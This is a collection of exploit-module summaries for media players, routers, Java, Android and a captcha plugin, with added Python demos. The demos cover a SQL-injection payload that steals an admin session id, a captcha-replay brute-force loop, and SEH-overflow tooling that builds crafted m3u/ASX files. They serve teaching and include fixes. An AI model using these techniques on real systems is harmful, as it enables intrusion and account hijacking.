This module exploits a stack-based buffer overflow in CCMPlayer 1.5. When an m3u playlist containing a long track name is opened, an SEH exception record can be overwritten with parts of the attacker-controlled buffer. The exception handler is then invoked after an invalid read from an injectable address, allowing arbitrary code execution.
When handling the 'update' action, 'default_comment_display' is the only parameter that is not sanitized with mysql_real_escape_string(), so arbitrary SQL can be injected through it. Because the statement is a multi-line query and recent MySQL versions do not accept a comment opened with /* that is never closed by a */, it is sometimes impossible to alter the contents of the 'users' table (for example to change the admin's password). It is still possible, however, to inject a subquery that fetches, for example, the admin's session id for a session hijacking attack.
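The injection described above, as an added example that is not the application's code: a hypothetical 'update' handler escapes every value except 'default_comment_display', and the payload is written so that the rest of the multi-line query stays syntactically valid (no comment truncation). The subquery's result ends up stored in the setting itself, where it is later displayed. The table names, columns, the admin session id and the escape() stand-in for mysql_real_escape_string() are all constructed for the demo; SQLite is used so it runs offline, and its `||` concatenation corresponds to CONCAT() on MySQL, where `||` is a logical OR by default.

```python
import sqlite3

# Constructed sample data, not taken from the real application.
ADMIN_SESSION = "9f1c2e7a-admin-session"


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, session_id TEXT);
        CREATE TABLE settings (id INTEGER PRIMARY KEY, site_name TEXT,
                               default_comment_display TEXT);
        INSERT INTO settings VALUES (1, 'My Blog', 'nested');
    """)
    con.execute("INSERT INTO users VALUES (1, 'admin', ?)", (ADMIN_SESSION,))
    con.commit()
    return con


def escape(s: str) -> str:
    """Stand-in for mysql_real_escape_string(): quotes are neutralised
    (SQLite doubles the single quote instead of backslash-escaping it)."""
    return s.replace("'", "''")


def update_vulnerable(con: sqlite3.Connection, site_name: str,
                      default_comment_display: str) -> None:
    """Hypothetical 'update' handler: every value is escaped except
    default_comment_display, mirroring the flaw described above."""
    sql = (
        "UPDATE settings SET\n"
        f"  site_name = '{escape(site_name)}',\n"
        f"  default_comment_display = '{default_comment_display}'\n"
        "WHERE id = 1"
    )
    con.execute(sql)
    con.commit()


def update_fixed(con: sqlite3.Connection, site_name: str,
                 default_comment_display: str) -> None:
    """Parameterised version: the input is data, never part of the statement."""
    con.execute(
        "UPDATE settings SET site_name = ?, default_comment_display = ? WHERE id = 1",
        (site_name, default_comment_display),
    )
    con.commit()


# The payload closes the string, splices in a subquery and reopens the string
# so that the original closing quote and the trailing WHERE clause still parse.
# MySQL equivalent:  ', CONCAT('', (SELECT session_id FROM users WHERE username='admin'), '
PAYLOAD = "' || (SELECT session_id FROM users WHERE username = 'admin') || '"


def current_display(con: sqlite3.Connection) -> str:
    """What the page would later render as the default comment display."""
    row = con.execute("SELECT default_comment_display FROM settings WHERE id = 1").fetchone()
    return row[0]


if __name__ == "__main__":
    con = setup_db()
    update_vulnerable(con, "My Blog", PAYLOAD)
    print("vulnerable handler stored:", current_display(con))
    con = setup_db()
    update_fixed(con, "My Blog", PAYLOAD)
    print("fixed handler stored:", current_display(con))
```

With the vulnerable handler the stored setting becomes the admin's session id; with the parameterised handler the payload is stored literally and nothing else is touched.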
This module exploits a Unicode stack-based buffer overflow in GOM Player 2.1.33.5071 that allows arbitrary code execution on the vulnerable system when a specially crafted ASX file is opened. The vulnerability is a boundary error in the handling of the ASX title tag: an overly long title overflows a stack buffer.
Multiple .bed files in the GOG.com copy of FlatOut are vulnerable to buffer overflows. Overwriting the original playlist_0.bed in %program files%\GOG.com\FlatOut\data\music with a crafted file and launching flatout.exe results in a crash with an exception offset of 61616161, which is the ASCII string 'aaaa' and shows that the overflowed data reaches the exception address.
This module exploits an unauthenticated remote root vulnerability in the ctek SkyRouter 4200 and 4300.
This module exploits a vulnerability in the Rhino Script Engine that a Java applet can use to run arbitrary Java code outside the sandbox. The vulnerability affects Java 7 and Java 6 Update 27 and earlier, and the module should work in any browser that supports Java (for example IE, Firefox and Google Chrome).
It is possible to bypass the captcha of the jQuery Real Person plugin in order to perform a brute force attack. A parameter is associated with each image and is used to check the characters entered by the user, but there is no proper check that the characters entered are the ones shown in the picture. An attacker can therefore pick one valid pair of parameter and characters and reuse it in every request to the web server. The parameter that determines the captcha image is named 'value'.
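The replay described above, as an added example that is neither the plugin's nor any site's code: a constructed server whose captcha check only confirms that the submitted characters are consistent with the client-supplied 'value' parameter (assumed here to be a truncated hash of the challenge text), beside a fixed check that compares against the challenge recorded server-side for that session and consumes it. The login, the password and the wordlist are all constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Assumption for the demo: 'value' is derived from the challenge text, so a
# server that recomputes it from the submitted characters learns nothing
# about which image this client was actually shown.
def challenge_value(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()[:16]


def verify_flawed(value: str, chars: str) -> bool:
    """Accepts any internally consistent (value, chars) pair, whoever made it."""
    return hmac.compare_digest(challenge_value(chars), value)


class Server:
    """Minimal login protected by a captcha; CORRECT_PASSWORD is constructed."""
    CORRECT_PASSWORD = "hunter2"

    def __init__(self, flawed: bool) -> None:
        self.flawed = flawed
        self.pending: dict[str, str] = {}   # session_id -> challenge text issued

    def new_challenge(self, session_id: str) -> str:
        text = secrets.token_hex(3)          # stand-in for the rendered image text
        self.pending[session_id] = text
        return challenge_value(text)         # what the page embeds as 'value'

    def captcha_ok(self, session_id: str, value: str, chars: str) -> bool:
        if self.flawed:
            return verify_flawed(value, chars)
        # Fixed: the expected text lives server-side, is bound to the session
        # and is consumed on use, so every attempt needs a freshly served image.
        expected = self.pending.pop(session_id, None)
        return expected is not None and hmac.compare_digest(expected, chars)

    def login(self, session_id: str, value: str, chars: str, password: str) -> bool:
        if not self.captcha_ok(session_id, value, chars):
            return False
        return hmac.compare_digest(password, self.CORRECT_PASSWORD)


def brute_force(server: Server, session_id: str, value: str, chars: str, wordlist):
    """Replay one known-good (value, chars) pair on every login attempt."""
    for candidate in wordlist:
        if server.login(session_id, value, chars, candidate):
            return candidate
    return None


WORDLIST = ["123456", "password", "qwerty", "hunter2", "letmein"]  # constructed

if __name__ == "__main__":
    # Against the flawed check the attacker never even needs a served image:
    # any self-consistent pair such as ("abc", challenge_value("abc")) passes.
    weak = Server(flawed=True)
    print("flawed:", brute_force(weak, "s1", challenge_value("abc"), "abc", WORDLIST))
    fixed = Server(flawed=False)
    value = fixed.new_challenge("s1")
    real_text = fixed.pending["s1"]
    print("fixed:", brute_force(fixed, "s1", value, real_text, WORDLIST))
```

Against the fixed server the first attempt consumes the only valid challenge and every later replay is rejected, so a brute force gets exactly one guess per captcha actually solved.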
Android < 2.3.4 is vulnerable to multiple information disclosure vulnerabilities. An attacker can exploit this by hosting a malicious web page and redirecting the user to a content provider URI, which forces a download of the HTML/JS payload. That payload uploads the files listed in the $filenames array to the attacker's server. The vulnerability was discovered by Thomas Cannon on 18 November 2010 and was assigned CVE-2010-4804.
The application is affected by a stack-based buffer overflow when it receives a long string in the 'HmiLoad' command.
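All of the long-string stack overflows on this page (the CCMPlayer m3u track name, the GOM Player ASX title, the FlatOut .bed crash and the 'HmiLoad' command) are triaged the same way, so here is one added example rather than one per entry. It is not from any of the modules above. A crash value such as the 61616161 ('aaaa') seen in the FlatOut entry proves the overflow reaches the exception address but gives no offset, because the file was filled with a single repeated byte; a cyclic pattern in which every 4-byte window is unique turns the next crash value into an exact offset. The block builds the Metasploit-style pattern, maps a debugger-printed value back to its offset, wraps it in minimal m3u and ASX files, and lays out the SEH record described in the CCMPlayer entry. The offset, the nSEH bytes, the handler address and the shellcode in the usage are placeholders, not values from any target.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern "Aa0Aa1Aa2...": every 4-byte window is
    unique, so a crash value maps back to a single offset (max 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(crash_value, length: int = 20280) -> int:
    """Locate crash_value in the pattern. Accepts the 4 bytes as seen in memory
    (bytes) or the little-endian hex form a debugger prints ("0x41306141").
    Returns -1 when the value is not part of the pattern, e.g. 0x61616161 from a
    buffer of repeated 'a' characters."""
    if isinstance(crash_value, str):
        needle = struct.pack("<I", int(crash_value, 16))
    else:
        needle = bytes(crash_value)
    return pattern_create(length).find(needle)


def build_m3u(track_name: bytes) -> bytes:
    """Minimal extended m3u with the controlled data in the track entry."""
    return b"#EXTM3U\n#EXTINF:-1,fuzz\n" + track_name + b".mp3\n"


def build_asx(title: bytes) -> bytes:
    """Minimal ASX with the controlled data in the title tag."""
    return (b'<ASX version="3.0">\n<ENTRY>\n<TITLE>' + title + b"</TITLE>\n"
            b'<REF href="track.mp3" />\n</ENTRY>\n</ASX>\n')


def seh_layout(offset: int, nseh: bytes, seh: int, shellcode: bytes,
               junk: bytes = b"A") -> bytes:
    """Classic SEH overwrite: [junk up to the record][nSEH: 4 bytes, usually a
    short jump][SEH: handler address, little-endian][shellcode]. The handler
    must point at a POP/POP/RET in a module without SafeSEH; choosing one is
    target-specific and not covered here."""
    if len(nseh) != 4:
        raise ValueError("nSEH must be exactly 4 bytes")
    return junk * offset + nseh + struct.pack("<I", seh) + shellcode


if __name__ == "__main__":
    # Stage 1: fuzz with a pattern instead of a single repeated byte.
    with open("fuzz.m3u", "wb") as f:
        f.write(build_m3u(pattern_create(5000)))
    with open("fuzz.asx", "wb") as f:
        f.write(build_asx(pattern_create(5000)))
    # Stage 2: feed the SEH handler value the debugger showed back in.
    print(pattern_offset("0x61616161"))   # -1: 'aaaa' proves control, no offset
    print(pattern_offset("0x41306141"))   # 0: first dword of the pattern
    # Stage 3: placeholder values only; real ones come from the crash and a
    # SafeSEH-free module in the target process.
    buf = seh_layout(1000, b"\xeb\x06\x90\x90", 0x11223344, b"\xcc" * 4)
    with open("seh.m3u", "wb") as f:
        f.write(build_m3u(buf))
```

Read the SEH handler value from the debugger (or the exception offset in a crash report) and pass it to pattern_offset() as the hex string; the result is the distance from the start of the controlled data to the SEH record, with nSEH sitting four bytes before it.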
This module exploits a heap overflow vulnerability in XChat <= 2.8.9. It only works with XChat on KDE, and has been tested on Kubuntu and BackTrack 5; on Ubuntu it failed. Triggering the crash requires 1537 bytes of ASCII value 20, followed by an unknown number of any other characters.